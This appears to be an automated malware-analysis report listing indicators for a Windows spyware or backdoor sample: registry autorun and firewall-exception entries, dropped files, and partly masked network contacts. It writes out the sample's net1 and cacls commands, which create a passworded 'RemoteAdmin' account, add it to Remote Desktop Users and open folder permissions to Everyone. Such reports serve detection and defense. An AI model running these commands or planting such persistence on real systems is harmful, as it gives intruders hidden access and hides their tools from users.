Technical Information
Adds an autorun value under the Run key:
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'ccAppRemXP' = '%WINDIR%\msn64.exe'
Adds entries to the Windows Firewall authorized-applications list (standard profile), so that these programs are allowed through the firewall:
- [<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List] '%WINDIR%\vzones\smss.exe' = '%WINDIR%\vzones\smss.exe:*:Enabled:smss.exe'
- [<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List] '%WINDIR%\msn64.exe' = '%WINDIR%\msn64.exe:*:Enabled:Transparent Proxy Server'
- hidden files
- %WINDIR%\vzones\services.exe
- %WINDIR%\msn64.exe
- %TEMP%\Compress0\desktop.exe
- %WINDIR%\vzones\smss.exe
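Executes the following commands, which create a local account named RemoteAdmin, change its group memberships, and grant Everyone full control of two directories:
- <SYSTEM32>\net1.exe localgroup %USERNAME%s /Add RemoteAdmin
- <SYSTEM32>\net1.exe localgroup users /Delete RemoteAdmin
- <SYSTEM32>\net1.exe localgroup "Remote Desktop Users" /Add RemoteAdmin
- <SYSTEM32>\cacls.exe %WINDIR%\vzones /G Everyone:f
- <SYSTEM32>\cacls.exe %PROGRAM_FILES%\Accessories\Common /G Everyone:f
- <SYSTEM32>\net1.exe user RemoteAdmin ecotopia /add
(In the first command, '%USERNAME%s' looks like the analysis system's substitution of the logged-on user name inside a group name, probably 'Administrators'; this reading is not confirmed by the page, so match on the command shape rather than on that literal string.)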
- bdss.exe
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Trillian]
Sets the Explorer policy that removes the Folder Options menu item:
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoFolderOptions' = '00000001'
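File-system paths reported for this sample follow. Many paths appear more than once, presumably because they were listed under separate headings that are missing from this copy; the page does not show which file operation each group of paths records.
- %TEMP%\Compress0\ushost.dll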
- %TEMP%\Compress0\user.dll
- %TEMP%\Compress0\update.dll
- %TEMP%\Compress0\webas.dll
- %TEMP%\Compress0\ziplog.txt
- %TEMP%\Compress0\winsyst32.exe
- %TEMP%\Compress0\unir.exe
- %TEMP%\Compress0\seekil.dll
- %TEMP%\Compress0\seek.dll
- %TEMP%\Compress0\scloc.dll
- %TEMP%\Compress0\services.exe
- %TEMP%\Compress0\unin.dll
- %TEMP%\Compress0\type.dll
- %TEMP%\Compress0\ssap.dll
- %PROGRAM_FILES%\Accessories\Common\clog.txt
- %PROGRAM_FILES%\Accessories\Common\log.txt
- %WINDIR%\rsvert.dll
- %WINDIR%\slog.dll
- %PROGRAM_FILES%\Accessories\Common\WebsitesDetail.txt
- %PROGRAM_FILES%\Accessories\Common\WebsitesSummary.txt
- %PROGRAM_FILES%\Accessories\Common\OnlineTime.txt
- %PROGRAM_FILES%\Accessories\Common\desktop.ini
- %WINDIR%\msn64.exe
- %WINDIR%\vzones\smss.exe
- %WINDIR%\vzones\services.exe
- %WINDIR%\ruto32.exe
- <SYSTEM32>\MSWINSCK.OCX
- %WINDIR%\ziplog.txt
- %WINDIR%\refsdm.dll
- %TEMP%\Compress0\scint2.dll
- %TEMP%\Compress0\mailkl.dll
- %TEMP%\Compress0\mail.dll
- %TEMP%\Compress0\inuser.dll
- %TEMP%\Compress0\mailsc.dll
- %TEMP%\Compress0\oem.dll
- %TEMP%\Compress0\MSWINSCK.OCX
- %TEMP%\Compress0\msn.exe
- %TEMP%\Compress0\inter.dll
- %TEMP%\Compress0\desktop.exe
- %TEMP%\Compress0\delkl.dll
- %TEMP%\Compress0\ass.dll
- %TEMP%\Compress0\dete.dll
- %TEMP%\Compress0\inmsg.dll
- %TEMP%\Compress0\ften.dll
- %TEMP%\Compress0\dunin.dll
- %TEMP%\Compress0\scan.dll
- %TEMP%\Compress0\rwcs.dll
- %TEMP%\Compress0\rwci.dll
- %TEMP%\Compress0\sccle.dll
- %TEMP%\Compress0\scint.dll
- %TEMP%\Compress0\scen.dll
- %TEMP%\Compress0\scday.dll
- %TEMP%\Compress0\rwce.dll
- %TEMP%\Compress0\refsdm.dll
- %TEMP%\Compress0\pwhost.dll
- %TEMP%\Compress0\port.dll
- %TEMP%\Compress0\resu.dll
- %TEMP%\Compress0\rvport.dll
- %TEMP%\Compress0\rvhost.dll
- %TEMP%\Compress0\rmdesk.dll
- %TEMP%\Compress0\scen.dll
- %TEMP%\Compress0\scday.dll
- %TEMP%\Compress0\sccle.dll
- %TEMP%\Compress0\scloc.dll
- %TEMP%\Compress0\scint2.dll
- %TEMP%\Compress0\scint.dll
- %TEMP%\Compress0\rwce.dll
- %TEMP%\Compress0\rvport.dll
- %TEMP%\Compress0\rvhost.dll
- %TEMP%\Compress0\scan.dll
- %TEMP%\Compress0\rwcs.dll
- %TEMP%\Compress0\rwci.dll
- %TEMP%\Compress0\seek.dll
- %TEMP%\Compress0\ushost.dll
- %TEMP%\Compress0\user.dll
- %TEMP%\Compress0\update.dll
- %TEMP%\Compress0\ziplog.txt
- %TEMP%\Compress0\winsyst32.exe
- %TEMP%\Compress0\webas.dll
- %TEMP%\Compress0\ssap.dll
- %TEMP%\Compress0\services.exe
- %TEMP%\Compress0\seekil.dll
- %TEMP%\Compress0\unir.exe
- %TEMP%\Compress0\unin.dll
- %TEMP%\Compress0\type.dll
- %TEMP%\Compress0\dete.dll
- %TEMP%\Compress0\desktop.exe
- %TEMP%\Compress0\delkl.dll
- %TEMP%\Compress0\inmsg.dll
- %TEMP%\Compress0\ften.dll
- %TEMP%\Compress0\dunin.dll
- %TEMP%\~DF54D.tmp
- %TEMP%\~DFFBDB.tmp
- %TEMP%\~DF1451.tmp
- %TEMP%\Compress0\ass.dll
- %TEMP%\~DF454C.tmp
- %TEMP%\~DFA33B.tmp
- %TEMP%\Compress0\inter.dll
- %TEMP%\Compress0\pwhost.dll
- %TEMP%\Compress0\port.dll
- %TEMP%\Compress0\oem.dll
- %TEMP%\Compress0\rmdesk.dll
- %TEMP%\Compress0\resu.dll
- %TEMP%\Compress0\refsdm.dll
- %TEMP%\Compress0\mailkl.dll
- %TEMP%\Compress0\mail.dll
- %TEMP%\Compress0\inuser.dll
- %TEMP%\Compress0\MSWINSCK.OCX
- %TEMP%\Compress0\msn.exe
- %TEMP%\Compress0\mailsc.dll
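Network activity (the '#' characters appear to be masking applied by the report's publisher, so the address and host names below are incomplete and cannot be used as exact-match indicators as written):
- 'localhost':1041
- '69.#6.18.49':14001
- DNS ASK www.wi##spy.com
- DNS ASK ya##o.com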
- ClassName: 'NDDEAgnt' WindowName: 'NetDDE Agent'